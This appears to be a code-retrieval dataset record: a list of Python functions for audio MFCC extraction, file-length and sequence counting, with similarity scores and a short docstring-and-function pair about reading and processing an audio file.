sig = sig / 32768\n # Normalise so that max-value is 1\n sig = sig / max(sig)\n\n # calculate MFCC\n feat = mfcc(sig, samplerate=samp_rate, winlen=win_length / 1000, winstep=hop / 1000, preemph=0.95, numcep=14,\n winfunc=np.hamming)\n # print(sig.shape, feat.shape)\n return feat", "def getAudioLengthFromAudioFile(audiofileforlengthcheck):\n aprobe = []\n aprobe.extend(probe_header)\n aprobe.extend(['-i', audiofileforlengthcheck])\n aprobe.extend(probe_arguments)\n aout = sp.check_output(\n aprobe\n )\n aint = aout.decode().strip()\n return aint", "def length(analog_file):\n if analog_file[-10:] == 'analog.brw':\n with h5py.File(analog_file, 'r') as file:\n print(len(file[\"3BData\"][\"Raw\"]))\n else:\n raise NotImplementedError(\"Only for use with *analog.brw files\")", "def FileLen(filename):\n return os.stat(str(filename))[6]", "def wav2mfccDataAugmnetation(file_path):\r\n #Load .wav to array\r\n augmentArray =[]\r\n wave, _ = librosa.load(file_path, mono=Constants.channelMap[Tunable.tunableDict['channels']], sr=Tunable.tunableDict['samplingRate'])\r\n for i in range(Tunable.tunableDict['pitchShiftLower'], Tunable.tunableDict['pitchShiftUpper']):\r\n wave = librosa.effects.pitch_shift(wave, sr=Tunable.tunableDict['samplingRate'], n_steps=i)\r\n wave = np.asfortranarray(wave)\r\n\r\n #Convert to Mel-Frequency Cepstral Coefficients\r\n mfcc = librosa.feature.mfcc(wave, sr=Tunable.tunableDict['samplingRate'], n_mfcc=Tunable.tunableDict['buckets'])\r\n\r\n # If maximum length exceeds mfcc lengths then pad the remaining ones\r\n if Tunable.tunableDict['maxLen'] > mfcc.shape[1]:\r\n pad_width = Tunable.tunableDict['maxLen'] - mfcc.shape[1]\r\n mfcc = np.pad(mfcc, pad_width=((0, 0), (0, pad_width)), mode='minimum')\r\n\r\n # Else cutoff the remaining parts\r\n else:\r\n mfcc = mfcc[:, :Tunable.tunableDict['maxLen']]\r\n augmentArray.append(mfcc)\r\n\r\n return augmentArray", "def do_mfccs(fname):\n sound, srate = sf.read(fname)\n \n #f = Sndfile(fname,'r')\n #srate = f.samplerate\n #nf = f.nframes\n #sound = f.read_frames(nf) \n fbanks = Spectral(\n nfilt=40, # nb of filters in mel bank\n alpha=0.97, # pre-emphasis\n fs=srate, # sampling rate\n frate=100, # frame rate\n wlen=0.025, # window length\n nfft=512, # length of dft\n ncep=13, # nb of cepstral coefficients\n lowerf=100,\n upperf=6855.4976,\n do_deltas=True, # speed\n do_deltasdeltas=True # acceleration\n )\n fb = np.array(fbanks.transform(sound), dtype='float32')\n return fb", "def calc_mfccs(audio_data, samplerate, n_mfcc=13, n_fft=400, hop_length=160):\n mfcc = librosa.feature.mfcc(audio_data, sr=samplerate, n_mfcc=n_mfcc, n_fft=n_fft, hop_length=hop_length)\n\n # add derivatives and normalize\n mfcc_delta = librosa.feature.delta(mfcc)\n mfcc_delta2 = librosa.feature.delta(mfcc, order=2)\n mfcc = np.concatenate((normalize(mfcc),\n normalize(mfcc_delta),\n normalize(mfcc_delta2)), axis=0)\n\n return mfcc.T", "def cmgProcessFile(f, offsetRecs=0, numRecs=None, elementsPerRec=4):\n uStart,joiner,uStop = fileTimeRange(f)\n print offsetRecs, numRecs, elementsPerRec\n data = readPadFile(f, offsetRecs=offsetRecs, numRecs=numRecs, elementsPerRec=elementsPerRec)\n\n print '(%s) %.3f ' % (split(f,os.path.sep)[-1], uStart),\n iMax = getMaxAbs(data)\n\n## zugmax = (10.0**6)*(data[iMax[-1],-1]) # for ossbtmf\n## print '%7.1f @ %d' % (zugmax,iMax[-1])\n\n zugmax = (10.0**6)*(data[iMax[-3],-3]) # for ossraw\n print '%7.1f @ %d' % (zugmax,iMax[-3])", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def preprocess(self, file, num_mfcc=13, n_fft=2048, hop_length=512):\r\n\r\n # load and resample audio file\r\n signal, sample_rate = librosa.load(file, sr=DATASET_SAMPLE_RATE)\r\n\r\n # check length of signal\r\n if len(signal) >= COMMAND_LENGTH:\r\n # truncate signal to COMMAND_LENGTH\r\n signal = signal[:COMMAND_LENGTH]\r\n\r\n elif len(signal) < COMMAND_LENGTH:\r\n # zero pad signal to COMMAND_LENGTH\r\n padding = np.zeros(COMMAND_LENGTH - len(signal))\r\n signal = np.append(signal, padding)\r\n\r\n # extract MFCCs\r\n MFCCs = librosa.feature.mfcc(signal, sample_rate, n_mfcc=num_mfcc, n_fft=n_fft, hop_length=hop_length)\r\n\r\n # input data for the model should be 4 dimensional array: (# samples, # time steps, # coefficients, 1)\r\n MFCCs = MFCCs[np.newaxis, ..., np.newaxis]\r\n\r\n return MFCCs", "def get_dataset_length(file_path, had_header=True):\n with open(file_path, 'r') as f:\n length = 0\n for _ in f:\n length += 1\n length = length - had_header\n return length", "def __len__(self):\n return self._num_samples_per_file * len(self._files) // self._world_size", "def _get_file_length(self, file):\n self[file] = file.stat().st_size", "def file_length(fileName):\n with open(f_pass) as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def _filelength(self):\r\n with open(self.fileName, 'rb') as f:\r\n f.seek(0, 2) # move to end of file\r\n length = f.tell() # get current position\r\n return length", "def load_and_get_stats(filename):\n\n import scipy.io.wavfile as siow\n sampling_rate, amplitude_vector = siow.read(filename)\n\n wav_length = amplitude_vector.shape[0] / sampling_rate\n\n return sampling_rate, amplitude_vector, wav_length", "def countLength():\n counter = 0\n\n with open('bc.processed3.csv', 'r') as openfile:\n for line in openfile:\n counter += 1\n if counter == 1:\n print line\n\n print('Length: ', counter)", "def duration(file_path):\n command = [\"ffprobe\", \"-show_entries\", \"format=duration\", \"-i\", file_path]\n pipe = sp.Popen(command, stdout=sp.PIPE, stderr=sp.STDOUT)\n out, error = pipe.communicate()\n match_object = None if error else DURATION_REGEX.search(out.decode('utf-8'))\n if match_object is None:\n return 0\n length = float(match_object.group(1)) / 60\n return length", "def freq(self):\n a = re.search('(?<=_)[K,C,L,P]{1}(?<!_)', self.fname)\n if a is None:\n raise Exception(\"Can't determine frequency freq from CFX file\")\n else:\n return a.group()", "def parse_sequence_lengths(filepath, base_pair_limit):\n\n total_count = 0\n limit_count = 0\n with open(filepath) as f:\n line = f.readline()\n while line:\n if line.startswith('@'):\n total_count += 1\n seq = f.readline()\n sep = f.readline()\n qual = f.readline()\n if len(seq.strip()) > base_pair_limit:\n limit_count += 1\n line = f.readline()\n\n return limit_count / total_count", "def process_sound_file(file_path):\n\n return to_mfcc(get_wav(file_path))", "def get_Metadata_freq(metafile_science):\n\n mslist_file = open(metafile_science, 'r')\n LINES = mslist_file.readlines()\n mslist_file.close()\n\n frame = 'Frame'\n \n for i in range(len(LINES)):\n line = LINES[i]\n if line.find(frame) >=0:\n next_line = LINES[i+1]\n TOKS = next_line.split()\n chan_width = float(TOKS[10])*1000. # convert kHz to Hz\n cfreq = TOKS[12] #MHz\n nchan = TOKS[7]\n\n return chan_width, cfreq, nchan", "def find_dimesion(filename):\n file = open(filename,\"r\")\n\n line = file.readline()\n file.close()\n return len(line.split())", "def checkfrequency(inputgiven):\n data_size = 40000\n wav_file = wave.open(inputgiven, 'r')\n data = wav_file.readframes(data_size)\n wav_file.close()\n data = struct.unpack('{n}h'.format(n=data_size), data)\n print max(data)", "def num_frames(length, fsize, fshift):\n pad = (fsize - fshift)\n if length % fshift == 0:\n M = (length + pad * 2 - fsize) // fshift + 1\n else:\n M = (length + pad * 2 - fsize) // fshift + 2\n return M", "def countCharacters(file_name, start, end):\r\n\r\n with open(file_name, \"r\") as file:\r\n counter_chars = 0\r\n\r\n for line in islice(file, start, end):\r\n counter_chars += len(line)\r\n\r\n return counter_chars", "def get_fcc_diameters():\n catalog = Table.read(os.path.join(context.tables_dir, \"FCC_likely.fits\"))\n results = []\n for gal in catalog:\n galtab = Table()\n name = \"FCC {}\".format(gal[\"FCC\"])\n size_cat = gal[\"Reff\"]\n size_ned = query_size(name)\n size = np.max([size_cat, size_ned])\n galtab[\"Major Axis\"] = [size] * u.arcsec\n results.append(galtab)\n results = vstack(results)\n results.write(os.path.join(context.tables_dir, \"FCC_sizes.fits\"),\n overwrite=True)", "def countSamples(filename):\n with open(filename, \"r\") as f:\n line = f.readline().split(\"\\t\")\n return len(line) - 2", "def mfcc(\n frames: np.ndarray,\n sample_rate: int,\n n_mfcc: int = 20,\n dct_type: int = 2,\n lifter: int = 0,\n *,\n kwargs={},\n):\n l = []\n for frame in frames:\n l.append(\n np.mean(\n librosa.feature.mfcc(\n y=frame,\n sr=sample_rate,\n n_mfcc=n_mfcc,\n dct_type=dct_type,\n lifter=lifter,\n **kwargs\n ).T, axis=0\n )\n )\n return np.array(l)", "def mvarlen():\n\n global offset\n\n x=0L\n for i in range(4):\n\n try:\n byte=ord(midifile[offset])\n offset += 1\n except:\n error(\"Invalid MIDI file include (varlen->int)\")\n\n if byte < 0x80:\n x = ( x << 7 ) + byte\n break\n else:\n x = ( x << 7 ) + ( byte & 0x7f )\n\n return int(x)", "def get_counts(filename, alphabet, kmin, kmax):\n # get the list of kmers to count with length between kmin and kmax\n kmers_list = get_all_possible_kmers(alphabet, kmin, kmax)\n # initialyze the counter with all possible kmer with length\n # between kmin and kmax with zero counts\n counter = Counter(dict([(km, 0) for km in kmers_list]))\n # open and read in the kmers/string in the file\n with gzip.open(filename, 'rt') as fh:\n # iterates through the strings\n for line in fh:\n # make the adjustments int the strings\n kmer = line.replace('\\n', '')\n # check if kmer/string is in the counter\n if kmer in counter:\n # if kmer is in add 1 other wise keep the zero count\n counter[kmer] += 1\n return counter", "def max_min_kmer_sizes(filename):\n try:\n fh = gzip.open if isgzip(filename) else open\n with fh(filename, 'rt') as f:\n kmer_sizes = np.array([len(rec.split()[0]) for rec in f])\n\n return kmer_sizes.min(), kmer_sizes.max()\n\n except Exception:\n print('Not able to read file [%s]\\n' % filename)\n raise", "def Lof(channel):\n return FileLen(VBFiles.getFile(channel).name)", "def total_file_length(self):\n if self.is_multi_file():\n return sum([file['length'] for file in self.torrent['info']['files']])\n else:\n # single file\n return self.torrent['info']['length']", "def cnt_freq(filename):\n freq = [0] * 256\n try:\n f_in = open(filename,'r')\n except:\n raise FileNotFoundError\n for line in f_in:\n for char in line:\n freq[ord(char)] = freq[ord(char)] + 1\n f_in.close()\n return freq", "def count_seqs_from_file(fasta_file, parser=parse_fasta):\r\n result = 0\r\n lens = []\r\n for record in parser(fasta_file):\r\n result += 1\r\n lens.append(len(record[1]))\r\n if result == 0:\r\n return result, None, None\r\n else:\r\n return result, mean(lens), std(lens)", "def _read_file_for_magnets(sequence_file):\n LOG.debug(\" Reading File\")\n length_constants = {}\n magnet_strings = {}\n with open(sequence_file, 'r') as f_seq:\n for line in f_seq:\n var_and_value = _find_element_length(line)\n if var_and_value is not None:\n length_constants[var_and_value[0]] = var_and_value[1]\n else:\n var_and_value = _find_magnet_strength(line)\n if var_and_value is not None:\n magnet_strings[var_and_value[0]] = var_and_value[1]\n return magnet_strings, length_constants", "def mcc(self):\n tp = self.tp\n tn = self.tn\n fp = self.fp\n fn = self.fn\n return tp * tn / np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))", "def mfcc(samples, winlen, winshift, nfft, nceps, samplingrate):\n\n enframes = enframe(samples, winlen, winshift)\n # preemp_signal = map(lambda x: preemp(x, 0.97), enframes)\n preemp_signal = preemp(enframes, p=0.97)\n hamWindow = hamming(winlen, False)\n ham_signal = helper.combineHam(preemp_signal, hamWindow)\n\n if not nfft:\n nfft = 512\n\n spec, logspec_fft = fft(ham_signal, nfft);\n\n bank1 = tools.trfbank(samplingrate, nfft);\n mspec = helper.melSpec(spec, bank1)\n spec_dct = helper.cosineTransform(mspec)\n ceps = spec_dct[:, :nceps]\n\n return (spec, mspec, ceps)", "def mfcc(self, coeff_count=13, bell=False):\n samps = self.samples\n sound_length = self.length\n if bell:\n # Update the samples, the bell_time, and the length of\n # sound.\n samps, bell_time, sound_length = self.append_bell(samps)\n\n mfcc_seq = feature.mfcc(samps, sr=self.sr, n_mfcc=coeff_count)\n mfcc_sr = mfcc_seq.shape[1] / sound_length\n print(\"AudioClip--MFCC Sequence Generated\")\n if bell:\n return mfcc_seq, mfcc_sr, bell_time\n return mfcc_seq, mfcc_sr", "def get_file_size(fname, size_length):\n size = os.path.getsize(fname)\n return hex_encode(size, size_length)", "def get_data_duration(meta_file_name):\n try:\n with open(meta_file_name) as meta_file:\n info = kaa_metadata.parse(meta_file)\n except IOError:\n config_pytomo.LOG.error('Unable to open tempfile for kaa_metadata')\n\n if (info and 'length' in info):\n data_duration = info.length\n return data_duration", "def test(self, filename):\n hit = 0\n total = 0\n n = self.n\n for sent in open(filename):\n samp = sent.rstrip('\\n')\n# samp = '~' + samp + '~' \n for i in range(len(samp) - n):\n total = total + 1\n prev = samp[i:i + n - 1]\n pred = self.pred(prev)\n if pred == samp[i + n - 1]:\n hit = hit + 1\n \n return hit/total", "def get_cc(filename):\n logging.debug(f\"Trying to extract CC from {filename}\")\n try:\n filepath = Path(filename)\n assert filepath.exists()\n except Exception:\n logging.error(f\"Could not find a file to read at {filename}\")\n raise Exception(f\"Could not find a file to read at {filename}\")\n\n try:\n with open(filepath) as f:\n text = f.read()\n cc_string = re.findall(\"(?<=with CC)[ ]+[0-9]+.[0-9]+\", text)\n cc = float(cc_string[0].replace(\" \", \"\"))\n except Exception:\n logging.error(f\"Could not find CC in {filepath}\")\n raise\n\n return cc", "def analyze_text(filename):\n lines = 0\n characters = 0\n with open(filename, \"r\") as f:\n for line in f:\n lines += 1\n characters += len(line)\n return lines, characters", "def mfcc_features(y, sr, n_mels=128, n_mfcc=13):\n # Analyze only first second\n y = y[0:sr]\n\n # Calculate MFCCs (Mel-Frequency Cepstral Coefficients)\n mel_spectrum = librosa.feature.melspectrogram(y,\n sr=sr,\n n_mels=n_mels)\n log_spectrum = librosa.amplitude_to_db(mel_spectrum,\n ref=np.max)\n mfcc = librosa.feature.mfcc(S=log_spectrum,\n sr=sr,\n n_mfcc=n_mfcc)\n\n if mfcc.shape[-1] < DELTA_WIDTH:\n raise RuntimeError('MFCC vector does not contain enough time steps')\n\n if not mfcc.any():\n return np.zeros(n_mfcc * 3)\n\n # Standardize feature for equal variance\n delta_mfcc = librosa.feature.delta(mfcc, width=DELTA_WIDTH)\n delta2_mfcc = librosa.feature.delta(mfcc, order=2, width=DELTA_WIDTH)\n feature_vector = np.concatenate((\n np.mean(mfcc, 1),\n np.mean(delta_mfcc, 1),\n np.mean(delta2_mfcc, 1)))\n feature_vector = (\n feature_vector - np.mean(feature_vector)\n ) / np.std(feature_vector)\n\n return feature_vector", "def count_kmers(file_name, k, verbose=False):\n if verbose:\n start = time.time()\n print('Counting kmers in {}'.format(file_name))\n total_kmers = 0\n with open(file_name, 'r') as f:\n line_num = 0\n for line in f:\n if line_num % 4 == 1: # dna sequence\n total_kmers += len(line) - k # eliminate new-line\n line_num += 1\n if verbose:\n end = time.time()\n print('{} kmers are counted in {:.2f} seconds'.format(\n total_kmers, end - start))\n return total_kmers", "def has_fcc(self):\n raise NotImplementedError", "def mfcc(samples, winlen = 400, winshift = 200, preempcoeff=0.97, nfft=512, nceps=13, samplingrate=20000, liftercoeff=22):\n mspecs = mspec(samples, winlen, winshift, preempcoeff, nfft, samplingrate)\n ceps = cepstrum(mspecs, nceps)\n return lifter(ceps, liftercoeff)", "def get_track_length(track_path):\n track_extension = os.path.splitext(track_path)[1]\n if track_extension:\n try:\n mutagen_track = File(track_path)\n track_total_length = mutagen_track.info.length\n except:\n track_total_length = 0\n tkinter.messagebox.showwarning(\n title=\"Warning!\", message=f\"Audio file incorrect : {track_path}\")\n finally:\n track_length_formated = strftime(\n '%M:%S', gmtime(track_total_length))\n track_length_label.configure(text=track_length_formated)\n track_pos_slider.configure(to=track_total_length)\n return track_total_length", "def load_lengths(filename, return_base=False):\n data = pd.read_csv(filename, sep=\"\\t\", comment=\"#\", header=None)\n data = data.as_matrix()\n _, idx, lengths = np.unique(data[:, 0], return_counts=True,\n return_index=True)\n if return_base:\n return lengths[idx.argsort()], data[0, 3]\n else:\n return lengths[idx.argsort()]", "def flnc_readlength_csv(self):\n return op.join(self.csv_dir, \"flnc_readlength.csv\")", "def count_words_in_file(file_name):\n\n\treturn len(get_words_in_file(file_name))", "def dir_resolution(self, src_path, frag_length=128):\n src_path = os.path.join(self.root_path, src_path)\n files = os.listdir(src_path)\n\n MFCCs = None\n labels = None\n cnt = 1\n total_num = len(files)\n for wav in files:\n wav_path = os.path.join(src_path, wav)\n MFCCs_each, labels_each = self.features_and_labels(wav_path, frag_length)\n if MFCCs is not None:\n MFCCs = torch.cat((MFCCs, MFCCs_each))\n labels = torch.cat((labels, labels_each))\n else:\n MFCCs, labels = MFCCs_each, labels_each\n\n if cnt % 1000 == 0:\n print('{} data pieces have been loaded in and {} are left'.format(cnt, total_num-cnt))\n cnt += 1\n\n np.save(self.feature_file, MFCCs.numpy()) \n np.save(self.label_file, labels.numpy())\n print('Loading into files finished!')", "def get_duration_sox_n(audio_file_path: str) -> float:\n global FS_HZ\n assert FS_HZ is not None\n audiometadata = torchaudio.info(audio_file_path)\n num_frames = audiometadata.num_frames\n original_fs_hz = audiometadata.sample_rate\n duration_n = num_frames\n # TODO(theis): probably not exact value\n duration_n_resampled = round(duration_n * (FS_HZ / original_fs_hz))\n return duration_n_resampled", "def features_and_labels(soundfile, frag_length=128):\n label = soundfile.split('\\\\')[-1].split('_')[0]\n waveform, sample_rate = torchaudio.load(soundfile)\n MFCCs = transforms.MFCC(n_mfcc=128, melkwargs={'n_mels':128, 'win_length':320, 'hop_length':160, 'n_fft':1024 })(waveform[0][:])\n MFCCs = MFCCs.T.view((-1, frag_length, 128)) # transform the shape into (index, time_representation, melbands)\n\n frag_nums = MFCCs.shape[0]\n labels = int(label)*np.ones(frag_nums, dtype=np.int8)\n labels = torch.from_numpy(labels)\n\n return MFCCs, labels", "def _file_scale(fn):\n s = utils.file_word(fn)\n try:\n n = int(s, 0)\n except ValueError:\n n = float(s)\n return n", "def mfcc(samples, winlen=400, winshift=200, preempcoeff=0.97, nfft=512, nceps=13, samplingrate=20000, liftercoeff=22):\n frames = enframe(samples, winlen, winshift)\n preemph = preemp(frames, preempcoeff)\n windowed = windowing(preemph)\n spec = powerSpectrum(windowed, nfft)\n mspec = logMelSpectrum(spec, samplingrate)\n ceps = cepstrum(mspec, nceps)\n return lifter(ceps, liftercoeff)", "def lws_num_frames(length, fsize, fshift):\n pad = (fsize - fshift)\n if length % fshift == 0:\n M = (length + pad * 2 - fsize) // fshift + 1\n else:\n M = (length + pad * 2 - fsize) // fshift + 2\n return M", "def _calc_ctc_input_length(args):\n # py2 needs explicit tf import for keras Lambda layer\n import tensorflow as tf\n\n input_length, input_data, y_pred = args\n max_time_steps = tf.shape(input_data)[1]\n ctc_time_steps = tf.shape(y_pred)[1]\n ctc_input_length = tf.multiply(\n tf.to_float(input_length), tf.to_float(ctc_time_steps))\n ctc_input_length = tf.to_int32(tf.floordiv(\n ctc_input_length, tf.to_float(max_time_steps)))\n return ctc_input_length", "def ccs_readlength_csv(self):\n return op.join(self.csv_dir, \"ccs_readlength.csv\")", "def mfcc(signal, sampling_rate, factor=0.095, frame_size=0.025, frame_overlap=0.015, NFFT=512, num_filt = 40):\n pre_emphasized = pre_emphasize(signal)\n frames = make_frames(pre_emphasized, rate)\n\n #FFT and Power Spectrum\n #NFFT = 512\n mag_frames = np.absolute(np.fft.rfft(frames, NFFT)) # Magnitude of the FFT\n power_frames = ((1.0 / NFFT) * (np.power(mag_frames,2))) # Power Spectrum\n\n filter_banks = make_filter_banks(power_frames, rate, NFFT)\n\n #MFCC\n num_ceps = 20\n mfcc_40 = dct(filter_banks, type=2, axis=1, norm='ortho') \n mfcc = mfcc_40 #[:, 1 : (num_ceps + 1)] # Keep 2-13\n\n #Mean Normalization\n mfcc = mfcc - (np.mean(mfcc, axis=0) + 1e-6)\n\n mfcc_features = np.hstack((np.mean(mfcc.T, axis=1), np.std(mfcc.T, axis=1), skew(mfcc.T, axis = 1), \n np.max(mfcc.T, axis = 1), np.median(mfcc.T, axis = 1), np.min(mfcc.T, axis = 1)))\n \n return mfcc_features", "def count_words(filename):", "def load_mfccs(fnames):\n if isinstance(fnames, str):\n return load_mfccs_file(fnames)\n mfccs = []\n dists = []\n cats = []\n for fname in fnames:\n m, d, c = load_mfccs_file(fname)\n mfccs.extend(m)\n dists.append(d)\n cats.append(c)\n dists = np.concatenate(dists)\n cats = np.concatenate(cats)\n return mfccs, dists, cats", "def test_get_length_of_canonical_transcript(self):\n assert self.icd.get_length_of_canonical_transcript(\"ENSG00000171448\") == 4441\n assert self.icd.get_length_of_canonical_transcript(\"ENSG00000140157\") == 3225", "def get_line_length(file_path):\n with open(file_path, 'rb+') as f:\n return len(f.readline())", "def _get_scfinfo(self, file):\n f = open_general(file)\n tmptxt = f.readlines()\n f.close()\n # get rms and number of iterations\n itmp, niter, rms = 0, -1, -1\n while itmp >= 0:\n itmp = search_string('average rms-error', tmptxt)\n if itmp >= 0:\n tmp = tmptxt.pop(itmp).replace('D', 'E').split()\n niter = int(tmp[1])\n rms = float(tmp[-1])\n # get max number of scf steps\n itmp = search_string('SCFSTEPS', tmptxt)\n if itmp >= 0:\n nitermax = int(tmptxt.pop(itmp).split()[-1])\n # get qbound\n itmp = search_string('QBOUND', tmptxt)\n if itmp >= 0:\n qbound = float(tmptxt.pop(itmp).split()[-1])\n # get imix\n itmp = search_string('IMIX', tmptxt)\n if itmp >= 0:\n imix = int(tmptxt.pop(itmp).split()[-1])\n # get mixfac\n itmp = search_string('MIXFAC', tmptxt)\n if itmp >= 0:\n mixfac = float(tmptxt.pop(itmp).split()[-1])\n # get fcm\n itmp = search_string('FCM', tmptxt)\n if itmp >= 0:\n fcm = float(tmptxt.pop(itmp).split()[-1])\n # set mixinfo\n mixinfo = [imix, mixfac, qbound, fcm]\n # set converged and nmax_reached logicals\n converged, nmax_reached = False, False\n if nitermax==niter: nmax_reached = True\n if rms<qbound: converged = True\n # return values\n return niter, nitermax, converged, nmax_reached, mixinfo", "def getFileCount(self) -> int:\n ...", "def get_length(self):\r\n check_mixer()\r\n frequency, format, channels = (ffi.new('int*'), ffi.new('uint16_t*'),\r\n ffi.new('int*'))\r\n sdl.Mix_QuerySpec(frequency, format, channels)\r\n if format == sdl.AUDIO_S8 or format == sdl.AUDIO_U8:\r\n mixerbytes = 1.0\r\n else:\r\n mixerbytes = 2.0\r\n numsamples = self.chunk.alen / mixerbytes / channels[0]\r\n return numsamples / frequency[0]", "def count_len(self):\n total = 0\n for filename in self.filenames:\n f = open(os.path.join(self.directory, filename))\n line_count = 0\n for _ in f:\n line_count += 1\n if line_count < self.window_size:\n continue\n else:\n total += line_count - self.window_size + 1\n return total", "def file_len(fname):\n \n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def total_number():\r\n total_number = 0\r\n file_read = read_file()\r\n for key in file_read:\r\n total_number = total_number + len(file_read[key])\r\n return total_number", "def calculate_mixture_features(args):\n workspace = args.workspace\n speech_dir = args.speech_dir\n noise_dir = args.noise_dir\n data_type = args.data_type\n fs = cfg.sample_rate\n dir_name = args.dir_name\n\n fid_clean = open(speech_dir, 'r')\n lines_clean = fid_clean.readlines()\n fid_clean.close()\n\n fid_reverb = open(noise_dir, 'r')\n lines_reverb = fid_reverb.readlines()\n fid_reverb.close()\n\n for files_clean, files_reverb in zip(lines_clean, lines_reverb):\n\n files_clean = files_clean.strip('\\n')\n files_reverb = files_reverb.strip('\\n')\n\n fid = open(files_clean,'r')\n wavLines_clean = fid.readlines()\n fid.close()\n fid = open(files_reverb,'r')\n wavLines_reverb = fid.readlines()\n fid.close()\n\n cnt = 0 \n\n for wavs_clean, wavs_reverb in zip(wavLines_clean, wavLines_reverb):\n \n t1 = time.time()\n # cnt = 0\n\n wav_name_clean, wav_path_clean = wavs_clean.split()\n wav_name_reverb, wav_path_reverb = wavs_reverb.split()\n \n # Read clean speech audio. \n (speech_audio, _) = read_audio(wav_path_clean, target_fs=fs)\n \n # Read reverb speech audio. \n (noise_audio, _) = read_audio(wav_path_reverb, target_fs=fs)\n \n # Cut reverb speech to the same length as clean speech. \n if len(noise_audio) > len(speech_audio):\n noise_audio = noise_audio[0: len(speech_audio)]\n \n # Extract spectrogram. \n mixed_complx_x = calc_sp(noise_audio, mode='complex')\n speech_x = calc_sp(speech_audio, mode='magnitude')\n\n # Write out features. \n out_feat_path = os.path.join(workspace, \"features\", \"spectrogram\", \n data_type, dir_name, \"%s.p\" % wav_name_reverb)\n create_folder(os.path.dirname(out_feat_path))\n data = [mixed_complx_x, speech_x, wav_name_reverb]\n pickle.dump(data, open(out_feat_path, 'wb'), protocol=pickle.HIGHEST_PROTOCOL)\n \n # Print. \n if cnt % 100 == 0:\n print(cnt)\n # print(mixed_complx_x)\n # print(speech_x)\n \n cnt += 1\n\n print(\"Extracting feature time: %s\" % (time.time() - t1))", "def corpus_length(corpus):\n corpus_len = len(corpus)\n return corpus_len", "def test_character_count(self):\n self.assertEqual(analyze_text(self.filename)[1], 132)", "def calculate_correction(filedic):\n lanczos_cera = xr.open_mfdataset(filedic['lanczos(CERA)'], combine='by_coords')\n lanczos_noaa = xr.open_mfdataset(filedic['lanczos(20CR)'], combine='by_coords')\n return lanczos_noaa.drop('number').squeeze() - lanczos_cera.drop('number').squeeze()", "def parseFileLength(data_socket):\r\n fileLength = b'';\r\n i = 0;\r\n while (i < 4):\r\n fileLength = fileLength + next_byte(data_socket);\r\n i += 1;\r\n return int.from_bytes(bytes=fileLength, byteorder='big')", "def len(self):\n # print(self.processed_file_names)\n return self.len_", "def mfcc_features(self, audio, rate, numcep = 20, nfft = 2000, N = 2):\n self.mfcc = python_speech_features.mfcc(audio, rate, numcep = numcep, nfft = nfft)\n #self.mfcc = preprocessing.scale(self.mfcc)\n \n self.delta_mfcc = python_speech_features.delta(self.mfcc, N)\n \n self.mfcc_feature = np.hstack((self.mfcc, self.delta_mfcc))\n \n return self.mfcc_feature", "def file_len(filename):\n with open(filename) as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def get_size(fname):\n return os.path.getsize(fname)", "def get_num_features(corpus_file, side):\n if side == 'src':\n num_feats = 0\n else:\n with codecs.open(corpus_file, \"r\", \"utf-8\") as cf:\n f_line = cf.readline().strip().split()\n _, _, num_feats = ImageDataset.extract_text_features(f_line)\n\n return num_feats", "def _get_diameter(self,filename,maxLen=3):\n filename = os.path.splitext(filename)[0] \n filename = os.path.split(filename)[1] \n filename = filename.split(\"_\",3)[2] \n diameter = filename \n return diameter", "def countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def cm_lengths(starts, stops, recombination_data):\n np_starts = np.array(starts, dtype = np.uint32, copy = False)\n np_stops = np.array(stops, dtype = np.uint32, copy = False)\n cm_starts = cumulative_cm(np_starts, recombination_data)\n cm_stops = cumulative_cm(np_stops, recombination_data)\n return cm_stops - cm_starts", "def test_character_count(self):\n self.assertEqual(analyze_text(self.filename)[1], 970)", "def get_file_size(fname):\n return os.path.getsize(fname)", "def get_length(dna):\n return len (dna)", "def initialize_lengths():\n global length\n for id in document_filenames:\n l = 0\n for term in dictionary:\n l += imp(term,id)**2\n length[id] = math.sqrt(l)", "def get_feature_size_per_file(self, f_name):\n shape = utils_classif.get_shape(os.path.join(f_name.replace('.data', '.shape')))\n return shape[1]" ]
[ "0.6658678", "0.6523835", "0.6392451", "0.61464643", "0.5918345", "0.58868235", "0.5885237", "0.5809652", "0.5772686", "0.5743787", "0.57237357", "0.56915265", "0.5688", "0.5644551", "0.56252927", "0.5590044", "0.5578385", "0.55762726", "0.5562501", "0.5446046", "0.54189724", "0.541193", "0.5410561", "0.539335", "0.5343389", "0.53327954", "0.5316296", "0.53156567", "0.530105", "0.53002346", "0.529915", "0.5292487", "0.5285933", "0.5285453", "0.5271441", "0.5251416", "0.52339643", "0.5223239", "0.5220479", "0.5215434", "0.52027273", "0.51983106", "0.5197991", "0.5183105", "0.51800346", "0.51799744", "0.51799405", "0.51689553", "0.5151221", "0.5117632", "0.50906444", "0.5085703", "0.5077205", "0.50608015", "0.5055542", "0.5039815", "0.5036883", "0.5036621", "0.5026046", "0.5024728", "0.5023211", "0.50135905", "0.5006779", "0.4994611", "0.49819922", "0.4978587", "0.49747068", "0.49716604", "0.49681303", "0.49677026", "0.49662483", "0.49652442", "0.49578127", "0.49562714", "0.49491176", "0.49483776", "0.49481547", "0.49478328", "0.49411678", "0.49355662", "0.49322644", "0.49281636", "0.4921091", "0.49151975", "0.4913752", "0.4905058", "0.49047014", "0.4903016", "0.49018192", "0.4900778", "0.4900119", "0.4896181", "0.48961732", "0.48905206", "0.48835605", "0.48774016", "0.48729452", "0.48668468", "0.48593843", "0.48584476" ]
0.60624254
4
Reads in audio file, processes it
def process_audio_file(self, file_name): sig, sr = librosa.load(file_name, mono=True) return self._extract_function(sig, sr)
